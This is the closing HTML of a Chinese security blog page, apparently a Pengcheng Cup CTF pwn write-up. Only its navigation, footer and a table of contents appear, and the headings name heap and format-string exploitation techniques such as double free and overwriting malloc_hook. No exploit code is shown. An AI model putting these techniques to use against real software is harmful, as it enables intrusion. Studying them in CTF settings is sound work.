            <div class="post-nav-prev post-nav-item">
              
                <a href="/2019/05/15/android/" rel="prev" title="移动安全知识学习总结">
                  移动安全知识学习总结 <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </div>
  
  
  
  </article>

  </div>


          </div>
          

        </div>
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">

          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">GD</p>
  <div class="site-description motion-element" itemprop="description">a GOOD pwner</div>
</div>
  <nav class="site-state motion-element">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">13</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    
  </nav>



        </div>
      </div>
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#鹏城杯线下总结"><span class="nav-number">1.</span> <span class="nav-text">鹏城杯线下总结</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#原文首发自安全客"><span class="nav-number">1.1.</span> <span class="nav-text">原文首发自安全客</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">2.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#shotshot"><span class="nav-number">3.</span> <span class="nav-text">shotshot</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1、查看保护"><span class="nav-number">3.1.</span> <span class="nav-text">1、查看保护</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2、泄露地址"><span class="nav-number">3.2.</span> <span class="nav-text">2、泄露地址</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#（1）利用变量未初始化泄露"><span class="nav-number">3.2.1.</span> <span class="nav-text">（1）利用变量未初始化泄露</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（2）利用格式化字符串泄露地址"><span class="nav-number">3.2.2.</span> <span class="nav-text">（2）利用格式化字符串泄露地址</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3、低字节任意改"><span class="nav-number">3.3.</span> <span class="nav-text">3、低字节任意改</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#完整exp"><span class="nav-number">3.4.</span> <span class="nav-text">完整exp</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#littlenote"><span class="nav-number">4.</span> <span class="nav-text">littlenote</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1、查看保护-1"><span class="nav-number">4.1.</span> <span class="nav-text">1、查看保护</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2、ida打开分析"><span class="nav-number">4.2.</span> <span class="nav-text">2、ida打开分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3、泄露地址"><span class="nav-number">4.3.</span> <span class="nav-text">3、泄露地址</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#（1）、利用scanf函数泄露地址"><span class="nav-number">4.3.1.</span> <span class="nav-text">（1）、利用scanf函数泄露地址</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（2）、利用double-free覆盖got表泄露地址"><span class="nav-number">4.3.2.</span> <span class="nav-text">（2）、利用double free覆盖got表泄露地址</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（3）、利用double-free修改chunk的size泄露"><span class="nav-number">4.3.3.</span> <span class="nav-text">（3）、利用double free修改chunk的size泄露</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4、改malloc-hook为one-gadget"><span class="nav-number">4.4.</span> <span class="nav-text">4、改malloc hook为one_gadget</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#完整exp-1"><span class="nav-number">4.5.</span> <span class="nav-text">完整exp</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#小结"><span class="nav-number">5.</span> <span class="nav-text">小结</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">GD</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.7.1</div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.3.0</div>

        








        
      </div>
    </footer>
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
      </div>

    

  </div>

  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

<script src="/js/utils.js?v=7.3.0"></script>
  <script src="/js/motion.js?v=7.3.0"></script>


  <script src="/js/schemes/muse.js?v=7.3.0"></script>


<script src="/js/next-boot.js?v=7.3.0"></script>




  




























  

  

  


  
  <script src="/js/scrollspy.js?v=7.3.0"></script>
<script src="/js/post-details.js?v=7.3.0"></script>


</body>
</html>
